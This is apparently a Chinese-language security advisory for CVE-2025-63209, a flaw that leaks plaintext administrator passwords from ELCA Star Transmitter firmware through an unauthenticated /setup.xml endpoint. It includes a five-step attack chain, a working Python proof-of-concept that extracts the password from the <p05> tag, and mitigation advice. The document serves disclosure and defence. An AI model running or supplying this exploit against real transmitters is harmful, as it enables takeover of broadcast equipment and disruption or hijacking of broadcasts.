CVE-2025-63209 | ELCA Star Transmitter 未授权管理员凭证泄露漏洞

漏洞信息

漏洞编号

CVE-2025-63209

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ELCA Star Transmitter Remote Control firmware 1.25 (STAR150, BP1000, STAR300, STAR2000, STAR1000, STAR500)

漏洞概述

CVE-2025-63209是ELCA Star Transmitter远程控制系统固件1.25版本中发现的高危信息泄露漏洞。该漏洞影响STAR150、BP1000、STAR300、STAR2000、STAR1000、STAR500等多款发射器型号。攻击者无需任何认证即可通过访问设备上未受保护的/setup.xml端点，直接获取管理员凭证和系统配置信息。更为严重的是，管理密码以明文形式存储在XML响应的<p05>标签中，攻击者获取后可直接登录管理后台，进而完全控制发射器系统，可能导致广播中断、恶意内容注入或进一步横向渗透。该漏洞属于OWASP Top 10中的敏感数据泄露类别，由于无需身份验证且可通过网络远程利用，CVSS评分达到7.5分。建议受影响用户尽快联系厂商获取安全更新或采取临时缓解措施。

技术细节

该漏洞源于ELCA Star Transmitter远程控制固件在实现管理接口时，未对/setup.xml端点实施任何身份验证机制。攻击者仅需构造HTTP GET请求访问目标设备的/setup.xml路径，服务器即会以XML格式返回包含敏感信息的响应。关键安全风险在于<p05>标签内直接明文存储管理员密码，攻击者解析该字段即可获得明文凭证。由于该固件通常部署于广播基础设施中，攻击者成功利用后可登录管理后台，修改发射器参数、干扰广播信号甚至植入恶意配置。建议通过抓包分析或访问POC链接验证漏洞存在性，厂商应尽快发布补丁，在该端点添加强身份验证机制，并对敏感数据进行加密存储。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者通过扫描发现目标ELCA Star Transmitter设备，确认/setup.xml端点可访问

STEP 2

步骤2: 漏洞探测

攻击者构造HTTP GET请求访问http://[target]/setup.xml，无需任何认证头

STEP 3

步骤3: 敏感数据提取

服务器返回XML响应，攻击者解析<p05>标签获取明文存储的管理员密码

STEP 4

步骤4: 凭证利用

攻击者使用获取的管理员密码登录管理后台，获得系统完全控制权

STEP 5

步骤5: 持久化控制

攻击者可修改发射器配置、植入恶意参数或建立持久化后门，导致广播中断或恶意内容传播

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-63209 PoC
ELCA Star Transmitter - Unauthenticated Admin Credential Disclosure
"""
import requests
import sys
import re

def exploit(target_url):
    """Exploit CVE-2025-63209 to retrieve admin credentials"""
    setup_xml_url = f"{target_url.rstrip('/')}/setup.xml"
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Requesting: {setup_xml_url}")
    
    try:
        response = requests.get(setup_xml_url, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Success! Received XML response ({len(response.text)} bytes)")
            
            # Extract admin password from <p05> tag
            password_match = re.search(r'<p05>([^<]+)</p05>', response.text)
            
            if password_match:
                admin_password = password_match.group(1)
                print(f"[+] Admin Password Found: {admin_password}")
            else:
                print("[-] No password found in <p05> tag")
            
            # Save full response
            with open('setup_xml_response.xml', 'w') as f:
                f.write(response.text)
            print("[*] Full response saved to setup_xml_response.xml")
            
            return True
        else:
            print(f"[-] Failed: HTTP {response.status_code}")
            return False
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://192.168.1.100")
        sys.exit(1)
    
    exploit(sys.argv[1])

影响范围

ELCA Star Transmitter Remote Control firmware 1.25 (STAR150)

ELCA Star Transmitter Remote Control firmware 1.25 (BP1000)

ELCA Star Transmitter Remote Control firmware 1.25 (STAR300)

ELCA Star Transmitter Remote Control firmware 1.25 (STAR2000)

ELCA Star Transmitter Remote Control firmware 1.25 (STAR1000)

ELCA Star Transmitter Remote Control firmware 1.25 (STAR500)

可能受影响的其他型号

防御指南

临时缓解措施

立即在防火墙或IPS上对/setup.xml端点实施访问限制，仅允许可信管理IP访问；临时禁用远程管理功能或将其限制在内网环境；启用设备日志审计，监控是否有异常访问尝试；考虑使用VPN建立安全通道访问管理后台；如条件允许，联系厂商获取安全固件更新。